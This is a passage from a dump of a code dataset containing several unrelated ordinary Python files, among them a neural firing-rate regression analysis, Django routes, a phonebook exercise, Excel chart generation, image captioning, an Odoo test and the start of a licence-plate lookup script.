negative_reward_count[task_2]\n negative_reward_count_st_t2 = negative_reward_count_st[task_2]\n positive_reward_count_t2 = positive_reward_count[task_2]\n positive_reward_count_st_t2 = positive_reward_count_st[task_2]\n negative_reward_count_ch_t2 = negative_reward_count_ch[task_2]\n positive_reward_count_ch_t2 = positive_reward_count_ch[task_2]\n reward_trial_in_block_t2 = reward_trial_in_block[task_2]\n \n firing_rates_t2 = 
firing_rates[task_2]\n ones = np.ones(len(choices_t2))\n \n predictors = OrderedDict([('Reward', reward_t2),\n ('Choice', choices_t2),\n ('Correct', correct_t2),\n ('A in Block', a_since_block_t2), \n ('A in Block x Reward', int_a_reward_t2), \n \n ('State', state_t2),\n ('Trial in Block', trials_since_block_t2),\n ('Interaction State x Trial in Block', interaction_trial_latent_t2),\n ('Interaction State x A count', interaction_a_latent_t2),\n \n ('Choice x Trials in Block', interaction_trial_choice_t2),\n ('Reward x Choice', reward_choice_int_t2),\n ('No Reward Count in a Block', negative_reward_count_t2),\n ('No Reward x Correct', negative_reward_count_st_t2),\n ('Reward Count in a Block', positive_reward_count_t2),\n ('Reward Count x Correct', positive_reward_count_st_t2),\n ('No reward Count x Choice',negative_reward_count_ch_t2),\n ('Reward Count x Choice',positive_reward_count_ch_t2),\n ('Reward x Trial in Block',reward_trial_in_block_t2),\n \n ('ones', ones)])\n \n \n X_2 = np.vstack(predictors.values()).T[:len(choices_t2),:].astype(float)\n n_predictors = X_2.shape[1]\n y_2 = firing_rates_t2.reshape([len(firing_rates_t2),-1]) # Activity matrix [n_trials, n_neurons*n_timepoints]\n tstats = reg_f.regression_code(y_2, X_2)\n \n C_2.append(tstats.reshape(n_predictors,n_neurons,n_timepoints)) # Predictor loadings\n \n \n # Task 3\n reward_t3 = reward[task_3]\n choices_t3 = choices[task_3]\n correct_t3 = correct[task_3]\n \n a_since_block_t3 = np.asarray(a_since_block)[task_3]\n int_a_reward_t3 = int_a_reward[task_3]\n state_t3 = state[task_3]\n trials_since_block_t3 = np.asarray(trials_since_block)[task_3]\n interaction_trial_latent_t3 = interaction_trial_latent[task_3]\n interaction_a_latent_t3 = interaction_a_latent[task_3]\n interaction_trial_choice_t3 = interaction_trial_choice[task_3]\n reward_choice_int_t3 = reward_choice_int[task_3]\n negative_reward_count_t3 = negative_reward_count[task_3]\n negative_reward_count_st_t3 = negative_reward_count_st[task_3]\n positive_reward_count_t3 = positive_reward_count[task_3]\n positive_reward_count_st_t3 = positive_reward_count_st[task_3]\n negative_reward_count_ch_t3 = negative_reward_count_ch[task_3]\n positive_reward_count_ch_t3 = positive_reward_count_ch[task_3]\n reward_trial_in_block_t3 = reward_trial_in_block[task_3]\n \n firing_rates_t3 = firing_rates[task_3]\n ones = np.ones(len(choices_t3))\n \n predictors = OrderedDict([('Reward', reward_t3),\n ('Choice', choices_t3),\n ('Correct', correct_t3),\n ('A in Block', a_since_block_t3), \n ('A in Block x Reward', int_a_reward_t3), \n \n ('State', state_t3),\n ('Trial in Block', trials_since_block_t3),\n ('Interaction State x Trial in Block', interaction_trial_latent_t3),\n ('Interaction State x A count', interaction_a_latent_t3),\n \n ('Choice x Trials in Block', interaction_trial_choice_t3),\n ('Reward x Choice', reward_choice_int_t3),\n ('No Reward Count in a Block', negative_reward_count_t3),\n ('No Reward x Correct', negative_reward_count_st_t3),\n ('Reward Count in a Block', positive_reward_count_t3),\n ('Reward Count x Correct', positive_reward_count_st_t3),\n ('No reward Count x Choice',negative_reward_count_ch_t3),\n ('Reward Count x Choice',positive_reward_count_ch_t3),\n ('Reward x Trial in Block',reward_trial_in_block_t3),\n \n ('ones', ones)])\n \n \n X_3 = np.vstack(predictors.values()).T[:len(choices_t3),:].astype(float)\n n_predictors = X_3.shape[1]\n y_3 = firing_rates_t3.reshape([len(firing_rates_t3),-1]) # Activity matrix [n_trials, n_neurons*n_timepoints]\n tstats = 
reg_f.regression_code(y_3, X_3)\n \n C_3.append(tstats.reshape(n_predictors,n_neurons,n_timepoints)) # Predictor loadings\n \n cpd_1_2.append(_CPD_cross_task(X_1,X_2,y_1,y_2).reshape(n_neurons,n_timepoints, n_predictors))\n \n cpd_2_3.append(_CPD_cross_task(X_2,X_3,y_2,y_3).reshape(n_neurons,n_timepoints, n_predictors))\n \n print(n_neurons)\n \n \n \n cpd = np.nanmean(np.concatenate(cpd,0), axis = 0)\n C = np.concatenate(C,1)\n \n C_1 = np.concatenate(C_1,1)\n \n C_2 = np.concatenate(C_2,1)\n \n C_3 = np.concatenate(C_3,1)\n \n cpd_1_2 = np.nanmean(np.concatenate(cpd_1_2,0), axis = 0)\n cpd_2_3 = np.nanmean(np.concatenate(cpd_2_3,0), axis = 0)\n\n \n return C, cpd, C_1,C_2, C_3, cpd_1_2,cpd_2_3, predictors_all,session_trials_since_block\n\n\n# predictors = OrderedDict([('Reward', reward_t2),\n# ('Choice', choices_t2),\n# ('Correct', correct_t2),\n# ('A in Block', a_since_block_t2), \n# ('A in Block x Reward', int_a_reward_t2), \n# \n# ('State', state_t2),\n# ('Trial in Block', trials_since_block_t2),\n# ('Interaction State x Trial in Block', interaction_trial_latent_t2),\n# ('Interaction State x A count', interaction_a_latent_t2),\n#\n# ('Choice x Trials in Block', interaction_trial_choice_t2),\n# ('Reward x Choice', reward_choice_int_t2),\n# ('No Reward Count in a Block', negative_reward_count_t2),\n# ('No Reward x Correct', negative_reward_count_st_t2),\n# ('Reward Count in a Block', positive_reward_count_t2),\n# ('Reward Count x Correct', positive_reward_count_st_t2),\n# ('No reward Count x Choice',negative_reward_count_ch_t2),\n# ('Reward Count x Choice',positive_reward_count_ch_t2),\n# ('Reward x Trial in Block',reward_trial_in_block_t2),\n \ndef svd_on_coefs():\n \n C, cpd, C_1, cpd_1,C_2, cpd_2, C_3, cpd_3, predictors,session_trials_since_block = regression_general(HP)\n C_PFC, cpd_PFC, C_1_PFC, cpd_1_PFC,C_2_PFC, cpd_2_PFC, C_3_PFC, cpd_3_PFC, predictors,session_trials_since_block = regression_general(PFC)\n\n# predictors = OrderedDict([('Reward', reward_t2),\n# ('Choice', choices_t2),\n# ('Correct', correct_t2),\n# ('A in Block', a_since_block_t2), \n# ('A in Block x Reward', int_a_reward_t2), \n# \n# ('State', state_t2),\n# ('Trial in Block', trials_since_block_t2),\n# ('Interaction State x Trial in Block', interaction_trial_latent_t2),\n# ('Interaction State x A count', interaction_a_latent_t2),\n#\n# ('Choice x Trials in Block', interaction_trial_choice_t2),\n# ('Reward x Choice', reward_choice_int_t2),\n# ('No Reward Count in a Block', negative_reward_count_t2),\n# ('No Reward x Correct', negative_reward_count_st_t2),\n# ('Reward Count in a Block', positive_reward_count_t2),\n# ('Reward Count x Correct', positive_reward_count_st_t2),\n# ('No reward Count x Choice',negative_reward_count_ch_t2),\n# ('Reward Count x Choice',positive_reward_count_ch_t2),\n# ('Reward x Trial in Block',reward_trial_in_block_t2),\n# \n# ('ones', ones)])\n \n no_choice_idn = [0,2,5,6,7,8,9]\n choice = [1,3,4,8,10]\n task_1_HP = C_1[choice,:,:]\n task_2_HP = C_2[choice,:,:]\n \n #HP \n task_1_HP = np.transpose(task_1_HP,[0,2,1]).reshape(task_1_HP.shape[0]*task_1_HP.shape[2], task_1_HP.shape[1])\n task_2_HP = np.transpose(task_2_HP,[0,2,1]).reshape(task_2_HP.shape[0]*task_2_HP.shape[2], task_2_HP.shape[1])\n #task_3 = np.transpose(task_3,[0,2,1]).reshape(task_3.shape[0]*task_3.shape[2], task_3.shape[1])\n \n \n where_are_NaNs = np.isnan(task_1_HP)\n task_1_HP[where_are_NaNs] = 0\n where_are_NaNs = np.isinf(task_1_HP)\n task_1_HP[where_are_NaNs] = 0\n \n \n where_are_NaNs = np.isnan(task_2_HP)\n 
task_2_HP[where_are_NaNs] = 0\n where_are_NaNs = np.isinf(task_2_HP)\n task_2_HP[where_are_NaNs] = 0\n \n \n u_t1, s_t1, vh_t1 = np.linalg.svd(np.transpose(task_1_HP), full_matrices = False)\n t_u = np.transpose(u_t1) \n t_v = np.transpose(vh_t1) \n \n \n s_task_1 = np.linalg.multi_dot([t_u, np.transpose(task_2_HP), t_v])\n s_1 = s_task_1.diagonal()\n\n \n sum_c_task_1 = np.cumsum(abs(s_1))/task_1_HP.shape[0]\n \n plt.plot(sum_c_task_1, 'black', label = 'HP')\n plt.legend()\n \n #PFC\n task_1_PFC = C_1_PFC[choice,:,:]\n task_2_PFC = C_2_PFC[choice,:,:]\n \n \n task_1_PFC = np.transpose(task_1_PFC,[0,2,1]).reshape(task_1_PFC.shape[0]*task_1_PFC.shape[2], task_1_PFC.shape[1])\n task_2_PFC = np.transpose(task_2_PFC,[0,2,1]).reshape(task_2_PFC.shape[0]*task_2_PFC.shape[2], task_2_PFC.shape[1])\n #task_3 = np.transpose(task_3,[0,2,1]).reshape(task_3.shape[0]*task_3.shape[2], task_3.shape[1])\n \n \n where_are_NaNs = np.isnan(task_1_PFC)\n task_1_PFC[where_are_NaNs] = 0\n where_are_NaNs = np.isinf(task_1_PFC)\n task_1_PFC[where_are_NaNs] = 0\n \n \n where_are_NaNs = np.isnan(task_2_PFC)\n task_2_PFC[where_are_NaNs] = 0\n where_are_NaNs = np.isinf(task_2_PFC)\n task_2_PFC[where_are_NaNs] = 0\n \n \n u_t1, s_t1, vh_t1 = np.linalg.svd(np.transpose(task_1_PFC), full_matrices = False)\n t_u = np.transpose(u_t1) \n t_v = np.transpose(vh_t1) \n \n \n s_task_1 = np.linalg.multi_dot([t_u, np.transpose(task_2_PFC), t_v])\n s_1 = s_task_1.diagonal()\n\n \n sum_c_task_1 = np.cumsum(abs(s_1))/task_1_PFC.shape[0]\n \n plt.plot(sum_c_task_1, 'green', label = 'PFC')\n plt.legend()\n\n \ndef plot_cpd_gen(data,fig_n,title):\n \n C, cpd, C_1,C_2, C_3, cpd_1_2,cpd_2_3, predictors_all,session_trials_since_block = regression_general(data_HP)\n cpd = cpd[:,:-1]\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n #c = [*colors][2:]\n c = ['violet', 'black', 'red','chocolate', 'green', 'blue', 'turquoise', 'grey', 'yellow', 'pink',\\\n 'purple','orange', 'darkblue', 'darkred', 'darkgreen','darkyellow','lightgreen']\n p = [*predictors_all]\n fig = plt.figure(1)\n \n fig.add_subplot(1,2,1)\n for i in np.arange(cpd.shape[1]):\n plt.plot(cpd[:,i], label =p[i], color = c[i])\n #plt.title(title)\n plt.legend()\n plt.ylabel('Coefficient of Partial Determination')\n plt.xlabel('Time (ms)')\n plt.title('HP')\n \n \n C, cpd, C_1,C_2, C_3, cpd_1_2,cpd_2_3, predictors_all,session_trials_since_block = regression_general(data_PFC)\n cpd = cpd[:,:-1]\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n #c = [*colors][2:]\n c = ['violet', 'black', 'red','chocolate', 'green', 'blue', 'turquoise', 'grey', 'yellow', 'pink',\\\n 'purple','orange', 'darkblue', 'darkred', 'darkgreen','darkyellow','lightgreen']\n p = [*predictors_all]\n fig.add_subplot(1,2,2)\n\n for i in np.arange(cpd.shape[1]):\n plt.plot(cpd[:,i], label =p[i], color = c[i])\n #plt.title(title)\n plt.legend()\n plt.ylabel('Coefficient of Partial Determination')\n plt.xlabel('Time (ms)')\n plt.title('PFC')\n \n firing = PFC['Data'][0]\n dm = PFC['DM'][0]\n\n coef = C[6]\n coef_average = np.mean(coef, 1)\n index = np.where(coef_average > 4)[0][1]\n #index = 192\n neuron = 0\n for sess,s in enumerate(firing):\n for n in range(s.shape[1]):\n neuron+=1\n if neuron == index:\n block_plot = session_trials_since_block[sess]\n trials = s[:,n,:]\n design = dm[sess]\n \n \n # Plot mean around choice\n ch = np.mean(trials[:,22:26],1)\n plt.figure()\n plt.plot(ch)\n plt.plot(block_plot)\n plt.plot(design[:,0])\n \n ch = np.mean(trials[:,42:50],1)\n plt.figure()\n 
plt.plot(ch)\n                    plt.plot(block_plot)\n                    plt.plot(design[:,0])\n                    \n                    \n\n\n\n    \n   # plt.vlines(32,ymin = 0, ymax = 0.15,linestyles= '--', color = 'grey', label = 'Poke')\n# \n# predictors = OrderedDict([('Reward', reward_t2),\n# ('Choice', choices_t2),\n# ('Correct', correct_t2),\n# ('A in Block', a_since_block_t2), \n# ('A in Block x Reward', int_a_reward_t2), \n# \n# ('State', state_t2),\n# ('Trial in Block', trials_since_block_t2),\n# ('Interaction State x Trial in Block', interaction_trial_latent_t2),\n# ('Interaction State x A count', interaction_a_latent_t2),\n#\n# ('Choice x Trials in Block', interaction_trial_choice_t2),\n# ('Reward x Choice', reward_choice_int_t2),\n# ('No Reward Count in a Block', negative_reward_count_t2),\n# ('No Reward x Correct', negative_reward_count_st_t2),\n# ('Reward Count in a Block', positive_reward_count_t2),\n# ('Reward Count x Correct', positive_reward_count_st_t2),\n# ('No reward Count x Choice',negative_reward_count_ch_t2),\n# ('Reward Count x Choice',positive_reward_count_ch_t2),\n# ('Reward x Trial in Block',reward_trial_in_block_t2),\n# \n# ('ones', ones)])\n    \n    \n    plt.ylim(0, 0.1)\n    fig = plt.figure()\n    for i in range(len(p)):\n        task_1 = np.mean(C_1[i,:], axis = 1).flatten()\n        task_2 = np.mean(C_2[i,:], axis = 1).flatten()\n       # task_3 = np.mean(C_3[4,:], axis = 1).flatten()\n        \n        argmax_neuron = np.argsort(-task_1)\n        task_2_by_1 = task_2[argmax_neuron]\n        task_1 = task_1[argmax_neuron]\n        #task_3_by_1 = task_3[argmax_neuron]\n        \n        y = np.arange(len(task_1))\n        fig.add_subplot(5, 4, i+1)\n        plt.scatter(y,task_2_by_1,s = 2, color = 'blue', label = 'Task 2 sorted by Task 1')\n        plt.plot(y,task_1,color = 'black', label = 'Task 1 sorted')\n        plt.title(p[i])\n        plt.tight_layout()\n\n        #plt.scatter(y,task_3_by_1,s = 2,color = 'slateblue', label = 'Task 3 sorted by Task 1')\n        \n        #plt.scatter(y,task_1,s = 2,color = 'black', label = 'Task 1 sorted')\n\n        #plt.plot(y,task_1,color = 'black', label = 'Task 1 sorted')\n        \n        \n\n\n    ","sub_path":"regressions/regressions_general.py","file_name":"regressions_general.py","file_ext":"py","file_size_in_byte":29133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"263825705","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n    # ex: /picker/\n    path('', views.HomeView.as_view(), name='index'),\n    # ex: /picker/items/\n    path('items/', views.ItemsView.as_view(), name='items'),\n    # ex: /picker/5\n    path('<int:pk>/', views.RecipeView.as_view(), name='recipe'),\n    # ex: /picker/add-recipe\n    path('add-recipe/', views.AddRecipeView.as_view(), name='add-recipe'),\n    # ex: /picker/add-ingredient\n    path('add-ingredient/', views.AddIngredientView.as_view(), name='add-ingredient'),\n]\n","sub_path":"dishpicker/picker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"164674673","text":"# No.10_B735042_김대겸\r\n\r\n# empty phone book list (phoneBook)\r\nphoneBook = []\r\ni = 0\r\n# start input mode\r\nwhile True:\r\n    name = input(\"Name? \")\r\n    if name == '': # if the user just presses Enter, exit input mode\r\n        break\r\n    phoneBook.append([])\r\n    phoneBook[i].append(name)\r\n    phoneNum = input(\"Phone number? \")\r\n    phoneBook[i].append(phoneNum)\r\n    i += 1\r\nprint()\r\n# print the phone book \r\nprint(\"Phone book: \", phoneBook)\r\nprint()\r\n# search mode\r\nwhile True:\r\n    wantName = input(\"Enter the name of the person whose phone number you want? \")\r\n    if wantName == '': # if the user just presses Enter, exit search mode.\r\n        break\r\n    finding = 0 # finding marks whether the requested name has been found; start at 0.\r\n    for i in range(len(phoneBook)):\r\n        if wantName in phoneBook[i]: # if the requested name is in this entry,\r\n            if wantName == phoneBook[i][0]:\r\n                finding += 1 # the name was found, so add 1 to finding\r\n                print(wantName, \"'s phone number is\", phoneBook[i][1]) \r\n        else: # the requested name is not in this entry.\r\n            pass # finding stays 0\r\n    if finding == 0: # finding == 0 means the name was never registered.\r\n        print(wantName, \"is not registered.\")\r\n    \r\n    \r\n","sub_path":"김대겸 (10).py","file_name":"김대겸 (10).py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"197738998","text":"import numpy as np\nimport matplotlib.pyplot as plt  # needed for the plot_flag branch below\n\n\ndef colormix(img, color='r, g, b', scale=[1], clim=[0,1], plot_flag=0):\n    s = img.shape\n    assert len(s) >= 2, 'colormix: need 3D image to convert rgb'\n    num_channel = s[0] \n\n    color = color.replace(' ','')\n    color = color.replace(';', ',')\n    color = color.split(',') \n    if len(color) < num_channel:\n        color = ['r', 'g', 'b', 'c', 'p', 'y']\n        color = color[:num_channel]\n    color_vec = convert_rgb_vector(color)\n\n    if len(scale) == 1 or len(scale) != num_channel:\n        scale = np.ones(len(s))\n\n    img_color = img.copy() \n    img_color = (img_color - clim[0]) / (clim[1] - clim[0])\n    for i in range(num_channel):\n        img_color[i] *= scale[i]\n\n    img_color = convert_rgb_img(img_color, color_vec)\n    if plot_flag:\n        plt.figure()\n        plt.imshow(img_color)\n    return img_color\n\n\ndef convert_rgb_vector(color):\n    n = len(color)\n    vec = np.zeros([n, 3])\n    for i in range(n):\n        if color[i] == 'r': vec[i] = [1, 0, 0]\n        if color[i] == 'g': vec[i] = [0, 1, 0] \n        if color[i] == 'b': vec[i] = [0, 0, 1]\n        if color[i] == 'c': vec[i] = [0, 1, 1] \n        if color[i] == 'p': vec[i] = [1, 0, 1] \n        if color[i] == 'y': vec[i] = [1, 1, 0]\n    return vec \n\n\ndef convert_rgb_img(img, color_vec):\n    s = img.shape\n    assert len(s) >= 2, 'need 3D image to convert rgb'\n    img_color = np.zeros([s[1], s[2], 3])\n    cR, cG, cB = 0, 0, 0\n    for i in range(s[0]):\n        cR += img[i] * color_vec[i][0]\n        cG += img[i] * color_vec[i][1]\n        cB += img[i] * color_vec[i][2]\n    img_color[:, :, 0] = cR\n    img_color[:, :, 1] = cG\n    img_color[:, :, 2] = cB\n    return img_color\n\n\n\n\n\n\n\n\n","sub_path":"pyxas/colormix.py","file_name":"colormix.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"62511853","text":"# import xlsxwriter module \r\nimport xlsxwriter \r\n\r\n# Workbook() takes one, non-optional, argument \r\n# which is the filename that we want to create. \r\nworkbook = xlsxwriter.Workbook('chart_pie.xlsx') \r\n\r\n# The workbook object is then used to add new \r\n# worksheet via the add_worksheet() method. \r\nworksheet = workbook.add_worksheet() \r\n\r\n# Create a new Format object to format cells \r\n# in worksheets using the add_format() method. \r\n\r\n# here we create a bold format object. \r\nbold = workbook.add_format({'bold': 1}) \r\n\r\n# create a data list . \r\nheadings = ['Category', 'Values'] \r\n\r\ndata = [ \r\n\t['Apple', 'Cherry', 'Pecan'], \r\n\t[60, 30, 10], \r\n] \r\n\r\n# Write a row of data starting from 'A1' \r\n# with bold format. \r\nworksheet.write_row('A1', headings, bold) \r\n\r\n# Write a column of data starting from \r\n# A2, B2, C2 respectively. 
\r\nworksheet.write_column('A2', data[0]) \r\nworksheet.write_column('B2', data[1]) \r\n\r\n# Create a chart object that can be added \r\n# to a worksheet using add_chart() method. \r\n\r\n# here we create a pie chart object . \r\nchart1 = workbook.add_chart({'type': 'pie'}) \r\n\r\n# Add a data series to a chart \r\n# using add_series method. \r\n# Configure the first series. \r\n#[sheetname, first_row, first_col, last_row, last_col]. \r\nchart1.add_series({ \r\n\t'name':\t 'Pie sales data', \r\n\t'categories': ['Sheet1', 1, 0, 3, 0], \r\n\t'values':\t ['Sheet1', 1, 1, 3, 1], \r\n}) \r\n\r\n# Add a chart title \r\nchart1.set_title({'name': 'Popular Pie Types'}) \r\n\r\n# Set an Excel chart style. Colors with white outline and shadow. \r\nchart1.set_style(10) \r\n\r\n# Insert the chart into the worksheet(with an offset). \r\n# the top-left corner of a chart is anchored to cell C2. \r\nworksheet.insert_chart('C2', chart1, {'x_offset': 25, 'y_offset': 10}) \r\n\r\n# Finally, close the Excel file \r\n# via the close() method. \r\nworkbook.close() \r\n","sub_path":"draw pie chart.py","file_name":"draw pie chart.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"288521507","text":"import torch\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport argparse\nimport pickle \nimport os\nimport csv\nfrom torchvision import transforms \nfrom build_vocab import Vocabulary\nfrom model import EncoderCNN, DecoderRNN\nfrom PIL import Image\n\n\n# Device configuration\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\ndef load_image(image_path, transform=None):\n image = Image.open(image_path).convert('RGB')\n image = image.resize([224, 224], Image.LANCZOS)\n \n if transform is not None:\n image = transform(image).unsqueeze(0)\n \n return image\n\ndef main(args):\n # Image preprocessing\n transform = transforms.Compose([\n transforms.ToTensor(), \n transforms.Normalize((0.485, 0.456, 0.406), \n (0.229, 0.224, 0.225))])\n \n # Load vocabulary wrapper\n with open(args.vocab_path, 'rb') as f:\n vocab = pickle.load(f)\n\n # Build models\n encoder = EncoderCNN(args.embed_size).eval() # eval mode (batchnorm uses moving mean/variance)\n decoder = DecoderRNN(args.embed_size, args.hidden_size, len(vocab), args.num_layers)\n encoder = encoder.to(device)\n decoder = decoder.to(device)\n\n # Load the trained model parameters\n encoder.load_state_dict(torch.load(args.encoder_path))\n decoder.load_state_dict(torch.load(args.decoder_path))\n\n words = ['person',\n 'bicycle',\n 'car',\n 'motorcycle',\n 'airplane',\n 'bus',\n 'train',\n 'truck',\n 'boat',\n 'traffic light',\n 'fire hydrant',\n 'stop sign',\n 'parking meter',\n 'bench',\n 'bird',\n 'cat',\n 'dog',\n 'horse',\n 'sheep',\n 'cow',\n 'elephant',\n 'bear',\n 'zebra',\n 'giraffe',\n 'backpack',\n 'umbrella',\n 'handbag',\n 'tie',\n 'suitcase',\n 'frisbee',\n 'skis',\n 'snowboard',\n 'sports ball',\n 'kite',\n 'baseball bat',\n 'baseball glove',\n 'skateboard',\n 'surfboard',\n 'tennis racket',\n 'bottle',\n 'wine glass',\n 'cup',\n 'fork',\n 'knife',\n 'spoon',\n 'bowl',\n 'banana',\n 'apple',\n 'sandwich',\n 'orange',\n 'broccoli',\n 'carrot',\n 'hot dog',\n 'pizza',\n 'donut',\n 'cake',\n 'chair',\n 'couch',\n 'potted plant',\n 'bed',\n 'dining table',\n 'toilet',\n 'tv',\n 'laptop',\n 'mouse',\n 'remote',\n 'keyboard',\n 'cell phone',\n 'microwave',\n 'oven',\n 'toaster',\n 'sink',\n 'refrigerator',\n 'book',\n 'clock',\n 'vase',\n 
'scissors',\n             'teddy bear',\n             'hair drier',\n             'toothbrush']\n\n    # Prepare images\n    if args.images:\n\n        # inputs path\n        input_path = os.listdir(args.images)\n        sentences = []\n\n        # folders in inputs\n        for path in input_path:\n            file_path = args.images+path+'/'\n            if os.path.isdir(file_path):\n                files = os.listdir(file_path)\n                # files in folders\n                for file in files:\n\n                    image = load_image(file_path+file, transform)\n                    image_tensor = image.to(device)\n\n                    # Generate a caption from the image\n                    feature = encoder(image_tensor)\n                    sampled_ids = decoder.sample(feature)\n                    sampled_ids = sampled_ids[0].cpu().numpy()          # (1, max_seq_length) -> (max_seq_length)\n\n                    # Convert word_ids to words\n                    sampled_caption = []\n                    for word_id in sampled_ids:\n                        word = vocab.idx2word[word_id]\n                        sampled_caption.append(word)\n                        if word == '<end>':\n                            break\n                    caption = ' '.join(sampled_caption)[8:-6]\n                    sentences.append(caption)\n                    for word in words:\n                        if word in caption:\n                            f = open('captions2.csv', 'a', encoding='utf-8', newline=\"\")\n                            writer = csv.writer(f)\n                            writer.writerow([file_path+file, word, caption])\n                            f.close()\n        \n        # Print out the image and the generated caption\n        # for s in sentences:\n        #     print(s)\n\n    # Prepare an image\n    else:\n        image = load_image(args.image, transform)\n        image_tensor = image.to(device)\n\n        found_words = []\n\n        # Generate a caption from the image\n        feature = encoder(image_tensor)\n        sampled_ids = decoder.sample(feature)\n        sampled_ids = sampled_ids[0].cpu().numpy()          # (1, max_seq_length) -> (max_seq_length)\n\n        # Convert word_ids to words\n        sampled_caption = []\n        for word_id in sampled_ids:\n            word = vocab.idx2word[word_id]\n            sampled_caption.append(word)\n            if word == '<end>':\n                break\n        sentence = ' '.join(sampled_caption)\n\n        for word in words:\n            if word in sentence:\n                found_words.append(word)\n\n        if 'hot dog' in sentence:\n            found_words.remove('dog')\n\n        return sentence, found_words\n        # Print out the image and the generated caption\n        # print(sentence)\n\n    \nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--image', type=str, help='input image for generating caption')\n    parser.add_argument('--images', type=str, help='input image directory for generating caption')\n    parser.add_argument('--encoder_path', type=str, default='models/encoder-5-3000.pkl', help='path for trained encoder')\n    parser.add_argument('--decoder_path', type=str, default='models/decoder-5-3000.pkl', help='path for trained decoder')\n    parser.add_argument('--vocab_path', type=str, default='data/vocab.pkl', help='path for vocabulary wrapper')\n    \n    # Model parameters (should be same as parameters in train.py)\n    parser.add_argument('--embed_size', type=int , default=256, help='dimension of word embedding vectors')\n    parser.add_argument('--hidden_size', type=int , default=512, help='dimension of lstm hidden states')\n    parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm')\n    args = parser.parse_args()\n    main(args)\n","sub_path":"models/pyflask/image_captioning/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":6924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"80656978","text":"# -*- coding: utf-8 -*-\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\n# from odoo.tests.common import SavepointCase\n# from odoo.addons.pos_survey.tests.test_data import TestData\n#\n# from odoo import fields\n# import logging\n# _logger = logging.getLogger(__name__)\n# import odoo\n# import odoo.tests\n# 
@odoo.tests.common.at_install(False)\n# @odoo.tests.common.post_install(True)\n\n# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\n# from odoo.addons.account.tests.account_test_classes import AccountingTestCase\nfrom odoo.tests.common import TransactionCase\n\n\n# class test_res_partner(TransactionCase):\n\nclass ClosePosSession(TransactionCase):\n    \n    def test_close_pos_session(self):\n        user_id = self.env['res.users'].create({\n            'name':'test user',\n            'login':'a',\n            'company_id':1\n        })\n        survey_id = self.env['survey.survey'].create({\n            'title':'Test Survey'\n        })\n        session_id = self.env['pos.session'].create({\n            'user_id':user_id.id,\n            'config_id':1\n        })\n        account_journal_id = self.env['account.journal'].create({\n            'name': 'bank',\n            'type': 'sale',\n            'code': 'Bank'\n        })\n        survey_user_input_id = self.env['survey.user_input'].create({\n            'survey_id':survey_id.id,\n            'session_id':session_id.id,\n        })\n        survey_question_id = self.env['survey.question'].create({\n            'question':'Test Question',\n            'survey_id':survey_id.id,\n            'journal_ids':[(6, 0, [session_id.statement_ids.journal_id.id])],\n            'page_id':1\n        })\n\n        # write method flow of survey.user_input\n        if survey_user_input_id.state == 'done':\n            if survey_user_input_id.session_id and survey_user_input_id.session_id.state != 'closed':\n                session_id.action_pos_session_closing_control()\n                session_id.action_pos_session_close()\n\n        # action survey user input method flow\n        user_input = self.env['survey.user_input'].browse(survey_user_input_id.id)\n        questions_to_fill = self.env['survey.question'].search([('survey_id', '=', survey_id.id),('journal_ids', '!=', False)])\n        for question in questions_to_fill:\n            for journal in question.journal_ids:\n                if journal.id in session_id.statement_ids.mapped('journal_id').mapped('id'):\n                    statement = session_id.statement_ids.filtered(lambda x : x.journal_id.id == journal.id)\n                    vals = {\n                        'user_input_id': user_input.id,\n                        'question_id': question.id,\n                        'page_id': question.page_id.id,\n                        'survey_id': question.survey_id.id,\n                        'skipped': False,\n                        'answer_type': 'number',\n                        'value_number': statement.total_entry_encoding\n                    }\n                    user_input_line = self.env['survey.user_input_line'].search([('user_input_id', '=', survey_user_input_id.id),('question_id', '=', survey_question_id.id)])\n                    if not user_input_line:\n                        new_user_input_id = self.env['survey.user_input_line'].create(vals)\n                        self.assertEqual(new_user_input_id.question_id.id,question.id)\n                        self.assertEqual(new_user_input_id.survey_id.id, question.survey_id.id)\n                        print(\"\\n\\n Automated Test Successfully Run\")\n                    else:  # update, because the session could have been updated\n                        user_input_line.write(vals)","sub_path":"pos_survey/tests/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"262867857","text":"\n# Main\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport imutils\nimport easyocr, pytesseract\nimport time\nimport re  # used to clean the OCR output below\nfrom tkinter import filedialog\nfrom tkinter import *\nimport mysql.connector, sys, os\nfrom mysql.connector import Error\n\ndef fetchFromDB(number):\n    try:\n        connection = mysql.connector.connect(host='localhost',\n                                             database='alpr',\n                                             user='root',\n                                             password=str(os.environ.get('Pass')))\n        cursor = connection.cursor(dictionary=True)\n        sql_fetch_query = \"\"\"select * from license_plates where PlateNumber=%s\"\"\"\n        cursor.execute(sql_fetch_query, (number,))\n        records = 
